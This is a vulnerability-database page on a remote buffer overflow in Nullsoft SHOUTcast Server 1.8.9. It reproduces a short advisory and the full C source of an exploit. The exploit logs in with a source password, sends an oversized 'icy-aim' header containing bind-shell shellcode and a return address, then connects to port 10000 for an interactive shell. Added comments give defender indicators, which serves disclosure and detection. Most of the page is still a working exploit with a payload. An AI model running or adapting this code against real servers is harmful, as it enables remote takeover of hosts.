
Nullsoft SHOUTCast 1.8.9 - Remote Buffer Overflow Vulnerability

🗓️ 01 Jul 2014 00:00:00 Reported by RootType
seebug
 seebug
🔗 www.seebug.org👁 29 Views

Nullsoft SHOUTCast Server Buffer Overflow Vulnerability Reporte

Code

                                                source: http://www.securityfocus.com/bid/4934/info

Nullsoft SHOUTcast Server is used to broadcast Shoutcast music. SHOUTcast Server is available for Windows, Linux and a number of other Unix based platforms.

A remote buffer overflow vulnerability has been reported in some versions of SHOUTCast Server. An authenticated DJ may supply oversized data to the server, which will then overflow a memory buffer. Execution of arbitrary code is reported to be possible.

This vulnerability has been confirmed on SHOUTCast Server for Windows, FreeBSD and Linux. Mac OS X and Solaris may also be vulnerable, but this has not been confirmed.

/*           _ ________            _____                        ______
 *  __ ___ ____       /____.------`    /_______.------.___.----`  ___/____ _______
 *       _/    \ _   /\   __.  __//   ___/_    ___.  /_\    /_    |     _/
 * ___ ._\    . \\  /__  _____/ _    /     \_  |    /__      |   _| slc | _____ _
 *    - -------\______||--._____\---._______//-|__    //-.___|----._____||
 * mayday.c - SHOUTcast v1.8.9 remote exploit   / \  / "Never trust a DJ"
 * by eSDee of Netric (www.netric.org)             \/
 *
 * Tested on:
 * - Redhat 7.x
 * - Redhat 6.x
 * - Suse 6.x
 * - Suse 7.x
 *
 * More information about this bug can be found at:
 * http://www.netric.org/advisories/netric-adv006.txt
 *
 */

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>

/*
 * Opaque machine-code payload embedded in the request built by main().
 * The only description available on this page is the author's own note
 * that it binds to port 10000; the bytes were not disassembled for this
 * comment.  main() reconnects to port 10000 after delivery, which is
 * consistent with that note.
 *
 * Defender note: an unexpected listener on TCP/10000 on a host running
 * SHOUTcast Server, or a new inbound connection to that port shortly
 * after a source/DJ login, is a post-exploitation indicator for this PoC.
 */
char shellcode[] =  /* binds to port 10000 by Bighawk */
        "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd"
        "\x80\x89\xc7\x52\x66\x68\x27\x10\x43\x66\x53\x89\xe1\x6a\x10"
        "\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50"
        "\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f"
        "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
        "\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";

/* Socket descriptor shared by main(), openhost() and shell(). */
int sock;
/* Old-style (unprototyped) declarations; usage() is defined below taking
 * a char * and is called with argv[0]. */
void usage();
void shell();

/*
 * main - proof-of-concept driver for the SHOUTcast Server overflow
 * described in the advisory text above (BID 4934).
 *
 * Flow, as visible in this function:
 *   1. Parse -t (target host), -p (port, default 8001) and -a (source
 *      password, default "changeme").
 *   2. Connect and send the password followed by a newline.  The advisory
 *      says the flaw is reachable by an authenticated DJ, so a valid
 *      source password is a precondition.
 *   3. Send an "icy-name" header and an "icy-aim" header whose value is
 *      1120 bytes long and carries the payload.
 *   4. Wait two seconds, close, and try to connect to port 10000; the
 *      result of that connect is the only success test.
 *
 * Defender notes:
 *   - The password default here is "changeme"; a server still using that
 *     source password meets the authentication precondition for anyone
 *     who can reach the source port.
 *   - An icy-* header value over a thousand bytes long, mostly 0x90, is
 *     not plausible client metadata and is a workable network signature.
 *   - See the referenced Netric advisory / BID entry for affected
 *     versions; this page does not state a fixed version.
 *
 * Returns 0 after shell() (which itself exits); exits with status 1 on
 * bad arguments or connection failure.
 */
int
main (int argc,char *argv[])
{
        /* buf1 holds the oversized header value, buf2 the full request. */
        char buf1[1130];
        char buf2[1800];
        char host[256];
        char pass[256]="changeme";

        int i=0;
        int c=0;
        int port=8001;
        /* Hard-coded 32-bit value placed inside the header value below.
         * Presumably the address meant to replace a saved return address in
         * the server (the name and the "Ret:" message suggest so); the
         * server-side layout is not shown on this page.  A fixed address
         * like this is specific to particular builds. */
        unsigned int ret = 0x08069687;

        fprintf(stdout,"SHOUTcast v1.8.9 remote exploit by eSDee of Netric\n");
        fprintf(stdout,"-----------------------------------(www.netric.org)\n");

        while((c=getopt(argc,argv,"t:p:a:")) !=EOF)
        {
                switch(c)
                {
                        case 'p':
                                port=atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr,"Invalid port.\n\n");
                                        exit(1);
                                }
                                break;
                        case 'a':
                                /* Zero first so the bounded copy is always terminated. */
                                memset(pass,0x0,sizeof(pass));
                                strncpy(pass,optarg,sizeof(pass) - 1);
                                break;
                        case 't':
                                memset(host,0x0,sizeof(host));
                                strncpy(host,optarg,sizeof(host) - 1);
                                break;
                        default:
                                usage(argv[0]);
                                exit(1);
                                break;
                }
        }


        if (strlen(host) == 0) {
                usage(argv[0]);
                exit(1);
        }
        sock=openhost(host, port);

        if (sock==-1) {
                fprintf(stderr,"- Unable to connect.\n\n");
                exit(1);
        }

        /* Source login: password, then newline.  No reply is read, so the
         * tool does not check whether the password was accepted. */
        write(sock, pass, strlen(pass));
        write(sock, "\n", 1);

        /* Fill the header value with 0x90 (the single-byte x86 NOP). */
        memset(buf2,  0x0, sizeof(buf2));
        memset(buf1, 0x90, sizeof(buf1));

        /* Payload copied in at offset 600 of the value. */
        for(i=0;i < strlen(shellcode); i++) buf1[i+600] = shellcode[i];

        /* `ret` stored least-significant byte first at offsets 759..762. */
        buf1[759] = (ret & 0x000000ff);
        buf1[760] = (ret & 0x0000ff00) >> 8;
        buf1[761] = (ret & 0x00ff0000) >> 16;
        buf1[762] = (ret & 0xff000000) >> 24;

        /* Terminate so that %s below emits exactly 1120 bytes. */
        buf1[1120] = 0x0;

        /* The oversized value travels in the "icy-aim" header; per the
         * advisory text the server overflows a memory buffer on such input. */
        sprintf(buf2,   "icy-name: netric\r\n"
                        "icy-aim: %s\r\n"
                        "\r\n", buf1);

        fprintf(stdout, "Connected, sending code...\n");
        fprintf(stdout, "Ret: 0x%08x\n", ret);

        write(sock, buf2, strlen(buf2));
        sleep(2);
        close(sock);

        /* Second connection goes to port 10000, the port the payload is
         * said to bind; failure to connect is reported as a failed attempt. */
        sock=openhost(host, 10000);

        if (sock==-1) {
                fprintf(stderr, "Exploit failed!\n\n");
                exit(1);
        }

        fprintf(stdout, "Exploiting succesful.\n");
        fprintf(stdout, "---------------------------------------------------\n");
        shell();
        return 0;
}

/*
 * usage - write the command-line synopsis to stderr.
 *
 * prog: program name substituted into the first line (callers in this
 *       file pass argv[0]).
 */
void
usage(char *prog)
{
        fprintf(stderr,"Usage: %s -t [-pa]\n",prog);
        /* The remaining lines carry no format arguments. */
        fputs("-t target       The host to attack.\n", stderr);
        fputs("-a password     Default password is \"changeme\".\n", stderr);
        fputs("-p port         Default port is 8001.\n\n", stderr);
}

/*
 * openhost - resolve `host` and open a TCP connection to it on `port`.
 *
 * host: name or address handed to gethostbyname().
 * port: TCP port in host byte order.
 *
 * Returns the connected descriptor, or -1 if resolution, socket creation
 * or connect() fails.  The descriptor is also stored in the file-scope
 * `sock`.  On a failed connect() the descriptor is not closed; `sock` is
 * simply set to -1.  The getprotobyname() result is used without a NULL
 * check, and only sin_family, sin_port and sin_addr of the address
 * structure are filled in.
 */
int
openhost(char *host,int port)
{
        struct hostent *resolved = gethostbyname(host);
        struct sockaddr_in peer;

        if (!resolved)
                return -1;

        sock = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
        if (sock == -1)
                return -1;

        peer.sin_family = AF_INET;
        peer.sin_port = htons(port);
        memcpy(&peer.sin_addr, resolved->h_addr, resolved->h_length);

        if (connect(sock, (struct sockaddr *)&peer, sizeof(peer)) == -1) {
                sock = -1;
        }

        return sock;
}

/*
 * shell - relay bytes between the local terminal and the file-scope
 * socket `sock` until an error occurs, then exit the process.
 *
 * main() calls this after connecting to port 10000.  A fixed command
 * string is sent first, then select() is used to copy socket data to
 * descriptor 1 and descriptor 0 input to the socket.  This function never
 * returns: it calls exit(2) on a negative recv()/read() and exit(0) when
 * the loop breaks.
 *
 * Defender note: the first bytes sent are "/bin/uname -a;/usr/bin/id;".
 * If the remote end is a command shell, as the payload comment implies,
 * those two programs running as children of the SHOUTcast server process
 * are a host-side indicator worth alerting on.
 */
void shell() /* taken from an old wuftp exploit */
{
        fd_set  fd_read;
        char buff[1024], *cmd="/bin/uname -a;/usr/bin/id;\n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);
        while(1) {
                /* select() rewrites the set, so both descriptors are re-added
                 * on every pass. */
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);
                if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
                if( FD_ISSET(sock, &fd_read) ) {
                        /* Only a negative return is treated as failure; a
                         * return of 0 falls through to the write below. */
                        if((n=recv(sock,buff,sizeof(buff),0))<0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }
                        if(write(1,buff,n)<0)break;
                }

                if ( FD_ISSET(0, &fd_read) ) {
                        if((n=read(0,buff,sizeof(buff)))<0){
                                fprintf(stderr,"EOF\n");
                                exit(2);
                        }
                        if(send(sock,buff,n,0)<0) break;
                }
                usleep(10);
                }
                /* Reached only when select(), write() or send() fails. */
                fprintf(stderr,"Connection lost.\n");
                exit(0);
}


                              
